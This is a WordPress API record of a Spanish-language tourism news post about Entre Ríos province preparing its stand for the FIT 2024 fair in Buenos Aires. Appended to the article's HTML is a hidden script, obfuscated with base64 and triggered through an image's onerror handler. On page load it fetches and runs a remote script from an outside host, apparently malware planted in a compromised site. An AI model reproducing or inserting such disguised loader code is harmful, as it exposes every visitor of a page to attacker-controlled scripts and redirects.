{"id":8676,"date":"2024-09-10T12:33:36","date_gmt":"2024-09-10T15:33:36","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8676"},"modified":"2025-08-13T15:38:48","modified_gmt":"2025-08-13T18:38:48","slug":"entre-rios-se-prepara-para-mostrarse-al-mundo-en-la-feria-internacional-de-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8676","title":{"rendered":"Entre R\u00edos se prepara para mostrarse al mundo en la Feria Internacional de Turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8e9d0114be43ab38be2096284719a2aa\" style=\"background-color:#065787\"><em>Se realiz\u00f3 la primera reuni\u00f3n con los municipios que compondr\u00e1n la puesta de la provincia en la gran vidriera del turismo latinoamericano.<\/em><\/h4>\n\n\n\n<p>La Feria Internacional del Turismo de Am\u00e9rica Latina (FIT 2024) se realizar\u00e1 del 28 de\u00a0septiembre al 1 de octubre en La Rural de Buenos Aires con la participaci\u00f3n de 50 pa\u00edses de las\u00a0distintas regiones del mundo; la representaci\u00f3n de todas las provincias argentinas; 1700\u00a0expositores del sector tur\u00edstico y la expectativa de superar los 125 mil visitantes que la\u00a0recorrieron en la edici\u00f3n 2023.<\/p>\n\n\n\n<p>Entre R\u00edos ser\u00e1 parte de ese escenario con un stand ubicado en el Sector Litoral del Pabell\u00f3n\u00a0Nacional, donde 44 municipios expondr\u00e1n la riqueza natural, tur\u00edstica, gastron\u00f3mica y festiva\u00a0que se extiende a lo largo y a lo ancho del territorio provincial.<\/p>\n\n\n\n<p>Este jueves, la Secretar\u00eda de Turismo de Entre R\u00edos mantuvo la primera reuni\u00f3n organizativa\u00a0con los responsables de turismo y promoci\u00f3n de los municipios a los fines de planificar la\u00a0muestra en lo que hace a la log\u00edstica, acreditaciones y adaptaci\u00f3n a la estrategia de\u00a0comunicaci\u00f3n que la provincia implementar\u00e1 para atraer turistas en lo que resta del a\u00f1o y con\u00a0vistas en el verano 2025.<\/p>\n\n\n\n<p>La puesta de Entre R\u00edos en FIT estar\u00e1 determinada por las 8 microrregiones que componen el\u00a0mapa provincial, cada una con sus atractivos, productos y experiencias, y sumar\u00e1 la alegr\u00eda de\u00a0sus fiestas y carnavales en los escenarios interno y externo del predio ferial.<\/p>\n\n\n\n<p>Las reuniones organizativas continuar\u00e1n desarroll\u00e1ndose en las pr\u00f3ximas semanas con el\u00a0objetivo de llegar a la fecha de la exposici\u00f3n de la mejor manera, ordenados y preparados para\u00a0representar a la provincia y captar el inter\u00e9s de los turistas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.entrerios.tur.ar\/noticia\/470\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"414\" height=\"98\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-8261\" style=\"width:321px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_.jpeg 414w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_-300x71.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_-320x76.jpeg 320w\" sizes=\"(max-width: 414px) 100vw, 414px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se realiz\u00f3 la primera reuni\u00f3n con los municipios que compondr\u00e1n la puesta de la provincia en la gran vidriera del turismo latinoamericano. La Feria Internacional del Turismo de Am\u00e9rica Latina (FIT 2024) se realizar\u00e1 del 28 de\u00a0septiembre al 1 de octubre en La Rural de Buenos Aires con la participaci\u00f3n de 50 pa\u00edses de las\u00a0distintas [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8677,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28,30],"tags":[],"class_list":["post-8676","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8676","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8676"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8676\/revisions"}],"predecessor-version":[{"id":10086,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8676\/revisions\/10086"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8677"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8676"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}